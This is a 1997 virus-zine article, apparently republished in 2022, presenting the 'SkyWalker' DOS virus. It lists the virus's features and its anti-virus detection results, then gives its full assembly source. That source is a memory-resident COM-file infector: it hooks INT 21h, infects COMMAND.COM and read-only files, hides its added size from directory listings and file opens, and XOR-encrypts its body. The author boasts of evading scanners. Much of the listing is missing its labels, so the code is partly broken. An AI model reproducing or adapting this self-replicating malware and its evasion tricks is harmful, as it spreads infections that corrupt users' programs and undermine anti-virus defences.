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SLAM3.028: The S˙k˙y˙W˙a˙l˙k˙e˙r virus by Virtual Daemon [SLAM]

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Published in 
 · 26 Feb 2022

Written by Virtual Daemon [SLAM] 1997


  • Virus Name: SkyWalker
  • Virus Author: Virtual Daemon
  • Group: SLAM
  • Virus Size: 709 bytes
  • Virus Type: TSR COM infector


  • XOR Encryption with a random variable
  • Infect files via 4bh (load or execute)
  • Size-Stealth on 11h/12h (find 1st/next FCB), 4eh/4fh (find 1st/next DTA), 3dh (open) and 6c00h (extended open)
  • Save/Restore file's date/time/attributes
  • Int 24h handler (no errors)
  • Infect COMMAND.COM
  • Infect read only files
  • NO Payload... :(

Anti-Virus Tests:

  • No detection with AidsTest
  • No detection with Toolkit
  • 'Unknown virus' detection with F-Prot 2.27 full heuristic
  • 'Unknown virus' detection with AVP 2.xx

This virus uses the concept of "size-stealth" to maximum. Besides the classical 11h/12h/4eh/4fh, I'm subtracting the size of the virus even when you read the file (3dh and 6c00h)... So, it may look a little like a full stealth virus, but it isn't. The only method to find the virus is to look carefully to the 1st 3 bytes. I can subtract the size of the file easily so you can't see the virus, BUT I CAN'T modify the 1st 3 bytes... Well, unless I write them on disk, and that would be full stealth... hehehe.. ;)

Hmm.... about anti-anti-virus: I have bad luck, bcoz my hard drive just got formatted and I have only F-Prot 2.27 and some old versions of Toolkit, AidsTest and AVP, so I couldn't hide the virus from TBAV or others. Anyway, the next version (if there will be one) will be 100% un-detected!

The name of the virus? Heheheh... :).... well, I choosed 'SkyWalker' bcoz

I'm a very big fan of Star Wars.

One last mention: the seconds are set to 60 for stealth checking...

| "May the force be with you!" |

.model tiny
org 0
call go4it
pop bp
sub bp,offset go4it

push ds
push es

call crypt ;decrypt the virus
mov ax,'VD' ;check if the virus is already installed
int 21h
cmp bx,ax
je restore

mov ax,es ;get PSP
dec ax
mov ds,ax ;get MCB

sub word ptr ds:[3],((heap-begin+1023)/1024)*64 ;substract size from MCB
sub word ptr ds:[12h],((heap-begin+1023)/1024)*64
mov es,word ptr ds:[12h]

push cs
pop ds
xor di,di
mov cx,(heap-begin)/2+1
mov si,bp
rep movsw ;load the virus in memory

xor ax,ax
mov ds,ax
sub word ptr ds:[413h],(heap-begin+1023)/1024 ;take 1 K of mem
push ds
lds ax,ds:[21h*4] ;save old INT 21h interrupt vector
mov word ptr es:oldint21,ax
mov word ptr es:oldint21+2,ds
pop ds
mov word ptr ds:[21h*4],offset myint21 ;set our INT 21h handler
mov ds:[21h*4+2],es
pop es
pop ds
lea si,[bp+offset jmpbuf]
mov di,100h
push di
retn ;return to host
jmpbuf db 0cdh,20h,0

mov al,3h

cmp ax,'VD'
jne may
mov bx,ax
cmp ah,4bh ;execute or load?
jne the
jmp infect
cmp ah,3dh ;open?
jne force
jmp open
cmp ax,6c00h ;extended open?
jne be
jmp open
cmp ah,11h ;find first FCB?
jne with
jmp FCB_stealth
cmp ah,12h ;find next FCB?
jne you
jmp FCB_stealth
cmp ah,4eh ;find first file handle?
je DTA_stealth
cmp ah,4fh ;find next file handle?
je DTA_stealth
db 0eah
oldint21 dd ?

push cs
call exithandler ;fake a int 21h call
jc no_files


push ax di es bx

mov ah,2fh ;DOS function=get DTA area in es:bx
int 21h

mov ax,es:[bx+16h]
and al,1eh ;test if infected
cmp al,1eh
jne not_inf

cmp word ptr es:[bx+1ah],(heap-begin)
ja hide
cmp word ptr es:[bx+1Ch],0 ;check if too large
je not_inf
sub word ptr es:[bx+1ah],(heap-begin)
pop bx es di ax
retf 2

push cs
call exithandler ;fake a int 21h call
or al,0
jnz skip_dir ;shit! error ocured! return to orig. 11h/12h
push ax bx es

mov ah,51h ;DOS function=get current PSP to es:bx
int 21h
mov es,bx
cmp bx,es:[16h] ;is the PSP ok?
jnz error

mov bx,dx ;get offset to unopened FCB in bx
mov al,[bx] ;al holds current drive
push ax
mov ah,2fh ;DOS function=get DTA area in es:bx
int 21h

pop ax
inc al

jnz no_ext ;normal FCB? Great...
add bx,7 ;if EXTENDED FCB skip 7 bytes
cmp word ptr es:[bx+1fh],0
jnz error

mov ax,es:[bx+17h]
and al,1eh ;test if infected
cmp al,1eh
jne error

sub word ptr es:[bx+1dh],(heap-begin)
pop es bx ax
retf 2

call dword ptr cs:[oldint21] ;fake an int 21h call
jc fucked ;open failed? shit! we must exit...

cmp ax,5 ;check if handle is a device
jb megafuck

push ax bx di es

xchg bx,ax
push bx ;save file handle
mov ax,1220h ;DOS function=get job file table entry
int 2fh

mov bl,es:[di]
mov ax,1216h ;DOS function=get adress of SFT entry
int 2fh
pop bx ;restore file handle

mov ax,es:[di+0dh]
and al,1eh ;test if infected
cmp al,1eh
jne noway

cmp word ptr es:[di],1 ;check if file has already been opened
ja noway ;too bad! We can't stealth it...
sub es:[di+11h],(heap-begin)
pop es di bx ax
retf 2

push ax bx cx dx si di bp ds es
push ds
push dx

mov ax,3524h ;save old Int 24h handler
int 21h
mov word ptr cs:[old_24],bx
mov word ptr cs:[old_24+2],es

push cs
pop ds
lea dx,my24 ;set new Int 24h handler
mov ax,2524h
int 21h

pop dx
pop ds
mov ax,4300h
int 21h
push ds
push dx
push cx
mov ax,4301h
xor cx,cx
int 21h

mov ax,3d02h
call dword ptr cs:[oldint21]
xchg ax,bx

mov ax,5700h
int 21h
mov word ptr cs:[file_time],cx
mov word ptr cs:[file_date],dx

push cs
pop ds
push cs
pop es

mov ah,3fh
lea dx,buffer
mov cx,3
int 21h

mov ax,4202h
xor cx,cx
int 21h

mov word ptr file_size,ax
mov word ptr file_size+2,dx

cmp word ptr buffer,'MZ' ;check if EXE
jne checkagain
jmp close_file
cmp word ptr buffer,'ZM'
je close_file

mov ax,word ptr file_size ;check if file is too big
cmp ax,65535-(endheap-begin)
ja close_file
cmp ax,(heap-begin) ;check if file is too small
jbe close_file

mov cx,word ptr buffer+1
add cx,heap-begin+3
cmp ax,cx
je close_file

mov di,offset jmpbuf
mov si,offset buffer
mov byte ptr [offset buffer],0e9h
sub ax,3
mov word ptr [offset buffer+1],ax

mov ah,2ch ;get encryption value
int 21h
cmp dx,0 ;if=0 then find another
je find_val
mov word ptr ds:[encrypt_val],dx

mov ax,08d00h ;move the virus body in memory and encrypt it
mov es,ax
xor di,di
xor si,si
mov cx,(heap-begin+1)/2 ;how much code to move
rep movsw
push es
pop ds
xor bp,bp

call crypt ;encrypt the virus body

mov ah,40h
lea dx,begin
mov cx,heap-begin
int 21h

mov ax,4200h
xor cx,cx
int 21h

mov ah,40h
lea dx,buffer
mov cx,3
int 21h

mov ax,5701h
mov cx,word ptr cs:[file_time]
mov dx,word ptr cs:[file_date]
or cl,1eh ;set seconds to 60
int 21h
mov ah,3eh
int 21h

mov ax,4301h
pop cx
pop dx
pop ds
int 21h

mov ds,word ptr cs:[old_24+2]
mov dx,word ptr cs:[old_24]
mov ax,2524h ;restore Int 24h handler
int 21h
pop es ds bp di si dx cx bx ax
jmp exithandler

old_24 dd ?
cad equ 53h
buffer db 3 dup (?)
encrypt_val dw 0
virname db 0,'S|k|y|W|a|l|k|e|r',0

db 66h ;for Sourcer
mov dx,word ptr ds:[bp+encrypt_val]
lea si,[bp+cryptstart] ;where to begin
mov cx,(endc-cryptstart)/2 ;how much to encrypt
xor word ptr ds:[si],dx ;xor words instead of bytes
add si,2
loop xor_loop

author db '[VD/SLAM]'
file_size dd ?
file_time dw ?
file_date dw ?
end begin

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